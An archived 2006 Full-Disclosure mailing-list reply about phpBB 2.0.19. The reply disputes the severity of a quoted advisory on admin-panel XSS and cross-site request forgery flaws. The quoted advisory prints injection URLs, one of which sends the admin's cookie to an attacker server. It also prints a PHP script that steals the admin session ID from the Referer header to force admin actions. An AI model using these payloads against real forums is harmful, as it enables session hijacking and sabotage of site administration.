lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <001601c628c8$bc0a4e00$6802a8c0@henry>
Date: Fri Feb  3 13:50:08 2006
From: berliner.does.not.mean.jelly.donut at googlemail.com (Berliner)
Subject: phpBB 2.0.19 Cross Site Request Forgeries and
	XSSAdmin

1. Basically all phpBB admin-side options do allow full HTML, including
javascript. That is the intended behaviour, as there are legitimate uses.

phpBB does however check the Session ID before allowing the changes to go to
the database.
Your exploit needs a valid admin session key and you need to get the admin
to visit the page (unless you happen to have a lot of luck with your IP)- be
it by a link or a reflecting page. And even then, it will only work, when
the admin has logged into the ACP prior to running into the trap.

2. That is a general problem with all pages allowing of-site pictures. It
has been discussed on the list before. Most of your examples won't work with
phpBB, due to the missing Session ID in the links.



> -----Original Message-----
> From: full-disclosure-bounces@...ts.grok.org.uk [mailto:full-disclosure-
> bounces@...ts.grok.org.uk] On Behalf Of Maksymilian Arciemowicz
> Sent: Friday, February 03, 2006 2:04 PM
> To: full-disclosure@...ts.grok.org.uk
> Subject: [Full-disclosure] phpBB 2.0.19 Cross Site Request Forgeries and
> XSSAdmin
> 
> Orginal Source: http://securityreason.com/achievement_securityalert/31
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> [phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]
> 
> Author: Maksymilian Arciemowicz (cXIb8O3)
> Date: 3.2.2006
> from SecurityReason.Com
> CVE-2006-0437 for the XSS issues
> CVE-2006-0438 for the CSRF issues
> 
> 
> - --- 0.Description ---
> phpBB is a high powered, fully scalable, and highly customizable Open
> Source
> bulletin board package. phpBB has a
> 
> user-friendly interface, simple and straightforward administration panel,
> and
> helpful FAQ. Based on the powerful PHP
> 
> server language and your choice of MySQL, MS-SQL, PostgreSQL or
> Access/ODBC
> database servers, phpBB is the ideal
> 
> free community solution for all web sites.
> Contact with author http://www.phpbb.com/about.php.
> 
> - --- 1. XSS admin ---
> In admin/admin_smilies.php you can create, modifcate smille. So nothing
> special but phpBB don't check what is going to db.
> 
> case savenew
> 
> - -448-473---
>    $smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ?
> $HTTP_POST_VARS['smile_code'] :
> 
> $HTTP_GET_VARS['smile_code'];
>    $smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ?
> $HTTP_POST_VARS['smile_url'] :
> 
> $HTTP_GET_VARS['smile_url'];
>    $smile_url = phpbb_ltrim(basename($smile_url), "'");
>    $smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ?
> 
> $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];
>    $smile_code = trim($smile_code);
>    $smile_url = trim($smile_url);
>    $smile_emotion = trim($smile_emotion);
> 
>    // If no code was entered complain ...
>    if ($smile_code == '' || $smile_url == '')
>    {
>     message_die(GENERAL_MESSAGE, $lang['Fields_empty']);
>    }
> 
>    //
>    // Convert < and > to proper htmlentities for parsing.
>    //
>    $smile_code = str_replace('<', '&lt;', $smile_code);
>    $smile_code = str_replace('>', '&gt;', $smile_code);
> 
>    //
>    // Save the data to the smiley table.
>    //
>    $sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)
>     VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" .
> str_replace("\'", "''",
> 
> $smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";
>    $result = $db->sql_query($sql);
> - -448-473---
> 
> Only "<" and ">" are restricted.
> 
> http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&sm
> ile_url=icon_mrgreen.gif&smile_emotion=c"
> onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN
> 
> http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&sm
> ile_url=icon_mrgreen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&s
> id=SIDofADMIN
> 
> http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&sm
> ile_url=icon_mrgreen.gif"%20onmouseover="alert(document.location='http://[
> SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN
> 
> and you have new smile. Ofcourse you can better do exploit. For IE and
> etc.
> 
> 
> - --- 2. Cross Site Request Forgeries ---
> phpBB admin in Administration Panel have SID in url. Ok. Example if you
> want
> see user profil or split, lock someone
> 
> post etc.
> 
> Like:
> http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec5
> 05d0
> http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900
> fed3b35
> etc.
> 
> If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON then
> you
> can create url to script with referer for admin.So when admin open profil
> the
> url will be executed. Need be referer in request.
> 
> Next problem is:
> 
> 103# if ( !preg_match("#^((ht|f)tp://)([^
> \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|
> png))$)#is", $avatar_filename) )
> 
> in includes/unsercp_avatar.php.
> 
> Why? Because this preg() don't have limit of chars.
> In mysql phpbb DB you have (*_users)
> 
> user_avatar varchar(100)
> 
> only 100 chars will go to db.
> So you can post url like
> 
> http://[HOST]/[DIR]/script.php/[100 chars].jpg
> 
> Sent:
> http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasons
> ecurityreasonsecurityreasonsecur.jpg
> 
> and in db is:
> http://[HOST]/[DIR]/script.php/securityreasonsecurityreasonsecurityreasons
> ecurityreasonsecurityreasonsecur
> 
> or in bbcode (IMG)
> 
> http://[HOST]/[DIR]/script.php/securityreason.jpg
> 
> Nothing special.. Ok..
> 
> You need create new user (nick name can be "FUCKmeADMIN" etc). And upload
> one
> script. Doesn't need be in serverwhere is phpbb.
> 
> - -script.php--
> <?php
> # SecurityReason.Com writed by Maksymilian Arciemowicz
> # Example exploit
> 
> $operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile
> _code=try&smile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReaso
> n.Com)\'%20';
> #
> http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=
> icon_mrgreen.gif"
> onmouseover='alert(document.cookie)'
> 
> $sid='';
> preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);
> 
> if($sid[1]!=''){
>  header("Location: ".$operation."&sid=".$sid[1]);
> }
> 
> ?>
> - -script.php--
> 
> In this script you need give someone operation. I think, can be:
> 
> http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&sm
> ile_url=icon_mrgreen.gif"%20onmouseover=\'alert("SecurityReason.Com)\'%20
> create new smilie.. and all char a, change to image with javascript (XSS).
> 
> http://[HOST]/[DIR]/admin/admin_smilies.php?mode=delete&id=63
> Delete someone smile.
> 
> http://[HOST]/[DIR]/admin/admin_words.php?mode=delete&id=1&sid=c1db64124b7
> ced0668dec5900fed3b35
> Delete word censor.
> 
> http://[HOST]/[DIR]/admin/admin_forums.php?mode=forum_order&move=15&f=4
> Change position of forum=4.
> 
> http://[HOST]/[DIR]/admin/admin_ranks.php?mode=delete&id=4
> Delete Rank Administration
> 
> http://[HOST]/[DIR]/login.php?logout=true
> Logout
> 
> etc..
> 
> If admin have in url SID and img tag is displaying that this script can
> get
> SID form HTTP_REFERER and redirect tooperation for admin
> (header("Location...")).
> Admin can't see result. This XSS in Point 1 can you used for this trick.
> 
> Solution is don't displaying <IMG> tags from user where have you SID in
> url.
> And use POST to any operations like create, remove smilies etc.
> 
> - --- 3. Greets ---
> sp3x
> 
> - --- 4. Contact ---
> Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
> Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
> GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
> SecurityReason.Com
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2 (FreeBSD)
> 
> iD8DBQFD41JC3Ke13X/fTO4RAhpsAJ46jnHCF0c9RROYPC1T88N9D/iOigCgwKUV
> 3YyVMR1NFsznOmjVpv6LVAc=
> =b2mM
> -----END PGP SIGNATURE-----
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> --
> No virus found in this incoming message.
> Checked by AVG Free Edition.
> Version: 7.1.375 / Virus Database: 267.15.0/248 - Release Date: 01.02.2006
> 

-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.1.375 / Virus Database: 267.15.0/248 - Release Date: 01.02.2006

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ